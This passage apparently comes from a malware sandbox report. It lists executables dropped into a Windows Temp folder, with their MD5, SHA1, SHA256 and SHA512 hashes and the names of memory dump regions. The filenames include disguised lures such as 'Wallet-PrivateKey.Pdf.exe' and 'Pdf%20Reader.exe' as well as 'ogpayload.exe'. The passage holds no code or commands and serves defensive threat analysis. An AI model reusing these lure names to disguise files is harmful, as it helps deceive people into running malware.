| SHA256 | 538b830838cbf62e6ce267b48e2eb165030686e5b6317f0b1e9205a3e08c73b8 |
| SHA512 | 5091a16ef7730449601a70b5ef5512a93c98c76beb8cfee1adc9d39780c49b1d712e764720b04e44e18c7b08633c5d453793462c18dc6bef14d82bf69892e18f |
C:\Users\Admin\AppData\Local\Temp\a\333.exe
| MD5 | 5855063b0ae049847b1d9eeced51a17b |
| SHA1 | 17cab3ae528d133d8f01bd8ef63b1a92f5cb23da |
| SHA256 | 62f8cfee286a706856ebe02b176db9169ae776c6609c23016868887ea6b0ab98 |
| SHA512 | c24970775e8da3f46763824b22fbccdbd2741836cdc3bd9966ef639db8db28cb1b888875da2babab037df6e26e5774f475f55ba10b6f354504185de4d5f4713f |
memory/2384-2632-0x0000000000D20000-0x0000000000D36000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\02.08.2022.exe
| MD5 | 6e2e5695aea9df994f972a50e9303216 |
| SHA1 | 12bef7c96f16f96e06cf338e9afa79f3a494d100 |
| SHA256 | b193363a955c7899df2b2a8116c86e6b94ce0eca9b86360afbf35bbfac9fe7fa |
| SHA512 | acc6e95f4bb345481a098b4f53bc7a93ad67ef3ed58b34dd3dcdc03f24b1453e802c5acd573840f90d619c74314c1465eeb1ba2845fc3722c04051ed99583278 |
C:\Users\Admin\AppData\Local\Temp\a\QGFQTHIU.exe
| MD5 | 6e3dc1be717861da3cd7c57e8a1e3911 |
| SHA1 | 767e39aa9f02592d4234f38a21ea9a0e5aa66c62 |
| SHA256 | d4a388cc151fa56379f9ac6ef8b7851b6750c2ecfc2c8f6904ac6002865c4f30 |
| SHA512 | da91742e1494c027616e114e42d3333d61eda91379f6ad2ba415dc39e0b5165a25498d60537b3cb12a49267c306dfbec87d3af528e27abc9946cd5fda6b129c1 |
C:\Users\Admin\AppData\Local\Temp\melt.txt
| MD5 | 298802dff6aa26d4fb941c7ccf5c0849 |
| SHA1 | 11e518ca3409f1863ebc2d3f1be9fb701bad52c0 |
| SHA256 | df99fdbdf7b92b29b1bf1ca4283b4de2e04643b9739d2d1089ab5808e8e5665d |
| SHA512 | 0301017dfef1b74855d6535f3fd542257689479cb933c2e8742b5b6b94e26107fa38e7fc21bdb83d45184750eced344856092330fb30a1ebbc24b2b9004c8946 |
C:\Users\Admin\AppData\Local\Temp\a\JJSPLOIT.V2.exe
| MD5 | d4a776ea55e24d3124a6e0759fb0ac44 |
| SHA1 | f5932d234baccc992ca910ff12044e8965229852 |
| SHA256 | 7ef4d0236c81894178a6cfc6c27920217bea42a3602ad7a6002834718ba7b93c |
| SHA512 | ba9127f7f84e55a37e4eb1dc1a50d10ef044f0b24a23d451187c8d1dedec26d3a37cf78e8763b351ef1e492e26b1ef9b28fc2331591ce1b53c3d76369d100f4b |
memory/4468-3128-0x00000000003F0000-0x0000000000714000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\CondoGenerator.exe
| MD5 | 5da0a355dcd44b29fdd27a5eba904d8d |
| SHA1 | 1099e489937a644376653ab4b5921da9527f50a9 |
| SHA256 | e7fa9494811b479f00405027a8bad59dccaa410ac439bdd046ed2c440d0e101f |
| SHA512 | 289ac0076045bcb1e8b35d572ed27eca424f718b9ef26d821a5cc7ee372203125a6c516b296044efc23ad4d4bd771e1d875cf74107b9205c5312a6c49d37b0a6 |
memory/6136-3179-0x00000000008E0000-0x0000000000C04000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\Wallet-PrivateKey.Pdf.exe
| MD5 | 036ba72c9c4cf36bda1dc440d537af3c |
| SHA1 | 3c10ef9932ffc206a586fe5768879bf078e9ebeb |
| SHA256 | bb41ae95f911a55ab1101ca7854918ec0f23548376d4846a2176b9c289102114 |
| SHA512 | c7e8c37787b759bca7fb6d02692c0263d6c60f606ee52e890f3c177dabd00ac6305cd43056164f6e16fbc18046a8c4226172f295ebc85e310ea7e52878d5137d |
memory/6660-3196-0x0000000000430000-0x0000000000450000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\Pdf%20Reader.exe
| MD5 | 9d347d5ac998a89f78ba00e74b951f55 |
| SHA1 | 73df3d5c8388a4d6693cbb24f719dba8833c9157 |
| SHA256 | 2ea5686422bd8fb6eda542e9a96588f9deb1c97c45f3cb7d3b21ac4da540b57c |
| SHA512 | 3db7421aa98e8e108bf982048dda7e0f09428c6498cf5f9f56ef499fb2fafc5deabde8ecb99e1fdd570d54ae9c0533b7502de5848c9e772708cf75509d0c9d9e |
memory/4072-3214-0x0000000000C90000-0x0000000000CA8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\ogpayload.exe
| MD5 | 4e7b96fe3160ff171e8e334c66c3205c |
| SHA1 | ad9dbdfb52d3c2ee9a57fe837605ec233db43a7f |
| SHA256 | e698a786c4dcd964e54903a98bfaa0638ce8f52e02658f1223805c6e3b1ca83c |
| SHA512 | 2e8968ce87a1670ff6b49f92beaee8c7d1b2fd94bc216507e255bb2a54d4073fbbd20b39e188fd40eb049da59bf27f9aed729c390525232e4a904e71e10f9b48 |
memory/2936-3225-0x0000000000480000-0x0000000000506000-memory.dmp
memory/2936-3237-0x0000000005C30000-0x0000000005C42000-memory.dmp